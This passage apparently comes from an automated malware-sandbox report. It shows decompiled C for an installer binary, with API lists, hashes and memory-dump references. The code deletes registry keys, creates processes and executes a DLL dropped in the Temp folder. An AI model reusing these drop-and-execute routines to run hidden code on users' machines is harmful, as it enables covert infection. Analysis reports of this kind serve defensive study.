                                                                  0x0040293e

                                                                  APIs
                                                                  • wsprintfA.USER32 ref: 00401E5A
                                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                  • %s %s, xrefs: 00401E4E
                                                                  • C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll, xrefs: 00401E53
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ExecuteShellwsprintf
                                                                  • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                  • API String ID: 2956387742-2547813112
                                                                  • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                  • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                  • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                  • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                  				void* _v8;
                                                                  				char _v272;
                                                                  				long _t14;
                                                                  
                                                                  				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                                                  				if(_t14 == 0) {
                                                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                  						if(_a12 != 0) {
                                                                  							RegCloseKey(_v8);
                                                                  							return 1;
                                                                  						}
                                                                  						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                                                  							break;
                                                                  						}
                                                                  					}
                                                                  					RegCloseKey(_v8);
                                                                  					return RegDeleteKeyA(_a4, _a8);
                                                                  				}
                                                                  				return _t14;
                                                                  			}






                                                                  0x00402af5
                                                                  0x00402afd
                                                                  0x00402b25
                                                                  0x00402b0f
                                                                  0x00402b56
                                                                  0x00000000
                                                                  0x00402b5e
                                                                  0x00402b23
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402b23
                                                                  0x00402b3a
                                                                  0x00000000
                                                                  0x00402b46
                                                                  0x00402b50

                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                  • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                  • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                  • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00401D32() {
                                                                  				void* _t18;
                                                                  				struct HINSTANCE__* _t22;
                                                                  				struct HWND__* _t25;
                                                                  				void* _t27;
                                                                  
                                                                  				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
                                                                  				GetClientRect(_t25, _t27 - 0x40);
                                                                  				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                  				if(_t18 != _t22) {
                                                                  					DeleteObject(_t18);
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
                                                                  				return 0;
                                                                  			}







                                                                  0x00401d3e
                                                                  0x00401d45
                                                                  0x00401d74
                                                                  0x00401d7c
                                                                  0x00401d83
                                                                  0x00401d83
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00401D38
                                                                  • GetClientRect.USER32 ref: 00401D45
                                                                  • LoadImageA.USER32 ref: 00401D66
                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                  • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                  • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                  • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 35%
                                                                  			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                  				char _v36;
                                                                  				char _v68;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t26;
                                                                  				void* _t34;
                                                                  				signed int _t36;
                                                                  				signed int _t39;
                                                                  				unsigned int _t46;
                                                                  
                                                                  				_t46 = _a12;
                                                                  				_push(0x14);
                                                                  				_pop(0);
                                                                  				_t34 = 0xffffffdc;
                                                                  				if(_t46 < 0x100000) {
                                                                  					_push(0xa);
                                                                  					_pop(0);
                                                                  					_t34 = 0xffffffdd;
                                                                  				}
                                                                  				if(_t46 < 0x400) {
                                                                  					_t34 = 0xffffffde;
                                                                  				}
                                                                  				if(_t46 < 0xffff3333) {
                                                                  					_t39 = 0x14;
                                                                  					asm("cdq");
                                                                  					_t46 = _t46 + 1 / _t39;
                                                                  				}
                                                                  				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                  				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
                                                                  				_t21 = _t46 & 0x00ffffff;
                                                                  				_t36 = 0xa;
                                                                  				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                  				_push(_t46 >> 0);
                                                                  				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
                                                                  				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
                                                                  				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
                                                                  			}













                                                                  0x0040454d
                                                                  0x00404551
                                                                  0x00404559
                                                                  0x0040455c
                                                                  0x0040455d
                                                                  0x0040455f
                                                                  0x00404561
                                                                  0x00404564
                                                                  0x00404564
                                                                  0x0040456b
                                                                  0x00404571
                                                                  0x00404571
                                                                  0x00404578
                                                                  0x00404583
                                                                  0x00404584
                                                                  0x00404587
                                                                  0x00404587
                                                                  0x00404594
                                                                  0x0040459f
                                                                  0x004045a2
                                                                  0x004045b4
                                                                  0x004045bb
                                                                  0x004045bc
                                                                  0x004045cb
                                                                  0x004045db
                                                                  0x004045f7

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                  • wsprintfA.USER32 ref: 004045DB
                                                                  • SetDlgItemTextA.USER32 ref: 004045EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                  • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                  • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                  • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 54%
                                                                  			E00401C19(void* __ecx) {
                                                                  				signed int _t30;
                                                                  				CHAR* _t33;
                                                                  				long _t34;
                                                                  				int _t39;
                                                                  				signed int _t40;
                                                                  				int _t44;
                                                                  				void* _t46;
                                                                  				int _t51;
                                                                  				struct HWND__* _t55;
                                                                  				void* _t58;
                                                                  
                                                                  				_t46 = __ecx;
                                                                  				 *(_t58 - 8) = E00402A9A(0x33);
                                                                  				 *(_t58 + 8) = E00402A9A(0x44);
                                                                  				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                                  					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                                  				}
                                                                  				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                                  				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                                  					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
                                                                  				}
                                                                  				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                                  				_push(1);
                                                                  				if(__eflags != 0) {
                                                                  					_t53 = E00402A9A();
                                                                  					_t30 = E00402A9A();
                                                                  					asm("sbb ecx, ecx");
                                                                  					asm("sbb eax, eax");
                                                                  					_t33 =  ~( *_t29) & _t53;
                                                                  					__eflags = _t33;
                                                                  					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                                  					goto L10;
                                                                  				} else {
                                                                  					_t55 = E00402A7D();
                                                                  					_t39 = E00402A7D();
                                                                  					_t51 =  *(_t58 - 0x10) >> 2;
                                                                  					if(__eflags == 0) {
                                                                  						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                                  						L10:
                                                                  						 *(_t58 - 0x34) = _t34;
                                                                  					} else {
                                                                  						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                                                  						asm("sbb eax, eax");
                                                                  						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                                  					}
                                                                  				}
                                                                  				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                                  				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                                  					_push( *(_t58 - 0x34));
                                                                  					E0040591D();
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
                                                                  				return 0;
                                                                  			}













                                                                  0x00401c19
                                                                  0x00401c22
                                                                  0x00401c2e
                                                                  0x00401c31
                                                                  0x00401c3b
                                                                  0x00401c3b
                                                                  0x00401c3e
                                                                  0x00401c42
                                                                  0x00401c4c
                                                                  0x00401c4c
                                                                  0x00401c4f
                                                                  0x00401c53
                                                                  0x00401c55
                                                                  0x00401ca2
                                                                  0x00401ca4
                                                                  0x00401cad
                                                                  0x00401cb5
                                                                  0x00401cb8
                                                                  0x00401cb8
                                                                  0x00401cc1
                                                                  0x00000000
                                                                  0x00401c57
                                                                  0x00401c5e
                                                                  0x00401c60
                                                                  0x00401c68
                                                                  0x00401c6b
                                                                  0x00401c93
                                                                  0x00401cc7
                                                                  0x00401cc7
                                                                  0x00401c6d
                                                                  0x00401c7b
                                                                  0x00401c83
                                                                  0x00401c86
                                                                  0x00401c86
                                                                  0x00401c6b
                                                                  0x00401cca
                                                                  0x00401ccd
                                                                  0x00401cd3
                                                                  0x004028d7
                                                                  0x004028d7
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                  • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                  • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                  • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 83%
                                                                  			E00401E9C() {
                                                                  				void* _t15;
                                                                  				void* _t24;
                                                                  				void* _t26;
                                                                  				void* _t31;
                                                                  
                                                                  				_t28 = E00402A9A(_t24);
                                                                  				E00404D62(0xffffffeb, _t13);
                                                                  				_t15 = E00405247(_t28, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                  				 *(_t31 + 8) = _t15;
                                                                  				if(_t15 == _t24) {
                                                                  					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                  				} else {
                                                                  					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                  						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                  							E00405CFC(0xf);
                                                                  						}
                                                                  						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                                                  						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                  							if( *(_t31 - 0x34) != _t24) {
                                                                  								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                  							}
                                                                  						} else {
                                                                  							E0040591D(_t26,  *(_t31 - 0x34));
                                                                  						}
                                                                  					}
                                                                  					_push( *(_t31 + 8));
                                                                  					CloseHandle();
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
                                                                  				return 0;
                                                                  			}







                                                                  0x00401ea2
                                                                  0x00401ea7
                                                                  0x00401eb2
                                                                  0x00401eb9
                                                                  0x00401ebc
                                                                  0x004026da
                                                                  0x00401ec2
                                                                  0x00401ec5
                                                                  0x00401ed6
                                                                  0x00401ed1
                                                                  0x00401ed1
                                                                  0x00401eeb
                                                                  0x00401ef4
                                                                  0x00401f04
                                                                  0x00401f06
                                                                  0x00401f06
                                                                  0x00401ef6
                                                                  0x00401efa
                                                                  0x00401efa
                                                                  0x00401ef4
                                                                  0x00401f0d
                                                                  0x00401f10
                                                                  0x00401f10
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                    • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                    • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                    • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                    • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                    • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                  • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 4003922372-1104044542
                                                                  • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                  • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                  • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                  • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405247(CHAR* _a4, CHAR* _a8) {
                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                  				signed char _t10;
                                                                  				int _t12;
                                                                  
                                                                  				0x7a1588->cb = 0x44;
                                                                  				_t10 = GetFileAttributesA(_a8);
                                                                  				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                                                  					_a8 = 0;
                                                                  				}
                                                                  				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                                                  				if(_t12 != 0) {
                                                                  					CloseHandle(_v20.hThread);
                                                                  					return _v20.hProcess;
                                                                  				}
                                                                  				return _t12;
                                                                  			}






                                                                  0x00405250
                                                                  0x0040525a
                                                                  0x00405265
                                                                  0x0040526b
                                                                  0x0040526b
                                                                  0x00405283
                                                                  0x0040528b
                                                                  0x00405290
                                                                  0x00000000
                                                                  0x00405296
                                                                  0x0040529a

                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                  • CloseHandle.KERNEL32(?), ref: 00405290
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405247
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: AttributesCloseCreateFileHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 2000254098-66219284
                                                                  • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                  • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                  • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                  • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004054CC(CHAR* _a4) {
                                                                  				CHAR* _t7;
                                                                  
                                                                  				_t7 = _a4;
                                                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                  					lstrcatA(_t7, 0x409010);
                                                                  				}
                                                                  				return _t7;
                                                                  			}




                                                                  0x004054cd
                                                                  0x004054e4
                                                                  0x004054ec
                                                                  0x004054ec
                                                                  0x004054f4

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3936084776
                                                                  • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                  • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
